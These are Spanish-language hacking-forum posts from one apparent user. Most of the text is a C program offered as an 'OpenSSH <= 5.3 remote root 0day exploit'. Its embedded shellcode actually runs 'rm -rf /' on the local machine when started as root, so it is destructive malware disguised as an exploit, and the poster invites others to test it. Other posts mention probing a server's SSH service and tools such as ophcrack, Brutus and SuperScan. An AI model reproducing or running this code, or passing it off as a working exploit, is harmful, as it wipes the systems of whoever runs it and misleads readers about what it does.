Mensajes

Hola h1t.


Ya he probado tu exploit, resultado:


El exploit falla, sin embargo se trata de un 0day para versiones recientes de SSH, en concreto en que foro lo haz visto? y cual es la vulnerabilidad que explota?

Bueno tengo que pedir disculpas por ese código tenia tanta prisa que ni siquiera me paré a observarlo un poco. lo saqué de esta web http://forum.guiadohacker.com.br/showthread.php?t=11113

EDITO: voy a echarle un ratito ahora a ver si logro sacar algo, posteo si tengo avances.

: )

He indagado un poco por la red y he encontrado un exploit de openssh que me queda por probarlo pero la hora que es no me da tiempo jajajaja. Os lo dejo por aquí a ver si le echais un vistazo y lo probais y tal.

Código [Seleccionar] Expandir

/*
*
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";

int main(int argc, char **argv)
{

    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;

    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }


Lo he extraido de un foro que por si las moscas no pongo la url por que no se si se podría tratar de spam o no no me queda claro jejeje, si por algún casual se tiene que poner pues indicadmelo y lo pongo sin problemas.

Saludoss y ánimo que esto lo sacamos entre todos jajajjaa.

Por youtube y eso podrás encontrar algo sobre hacking pero te recomiendo que deseches la idea de videotutoriales y mires manuales y busques info sobre este tema, en un video encontrarás algo muy específico y si quieres aprender a hackear tendras que leer y comprender. Como ultima recomendación pásate por el apartado: http://www.elhacker.net/Textos1.html y mira algunos de los que están allí.


: )

Creo recordar que a no ser que tengas una antena wifi no podrás ver lo que viaja pro wifi, teniendo una ehternet no puedes. Pero de todas formas voy a buscar info sobre el tema por que esta pregunta ya me la he hecho pero nunca he investigado jajajajaja. Si encuentor algo te comento

[Servicio]

Hola buenas después de mirar la información de dimitrix sobre los servicios del server, voy a probar el siguiente:
Servicio
22/tcp   open     ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)

voy a investigar un poco más sobre eso y a ver que sale.



: )

Me parece una buena iniciativa, yo me apunto

Bueno posteo para decir que ya lo he resuelto, me ha traicionado la vista, jajajaj había un botón que era "Cambiar tamaño de imagen". Suele pasarnos diría yo xD

Para aclararme un poquito, lo que quieres es digamos "instalar un ophcrack" en el propio sistema de BT5? si es así voy a aventurarme en el primer paso, podrias investigar un poco mas a fondo ophcrack y a ver que programa usa y luego extraerlo o algo así... es mas o menos una idea, si estoy equivocado decidlo jejeje

En la red debería de haber información de los dos, pero si no la encuentras siempre puedes recurrir a youtube jejejeje. Aqui te dejo dos videos de los dos programas que buscas ayuda:

Brutus: http://www.youtube.com/watch?v=XW6sub5DMEU
SuperScan: http://www.youtube.com/watch?v=_6Lr7e7cGdk


: )

He estado buscando información sobre esto pero no he encontrado nada, podría ser que no lo busco con los criterios adecuados o algo, mi duda es la siguiente:

Tengo una imagen de disco hecha en mac os x, la uso para como contenedor, pero en la "Utilidad de disco" cree una imagen de 20 GB pero resulta que s eme queda pequeño y me preguntaba si se podría redimensionar el tamaño de 20 GB a 30 GB por ejemplo.

Gracias por las respuesta que me podais dar.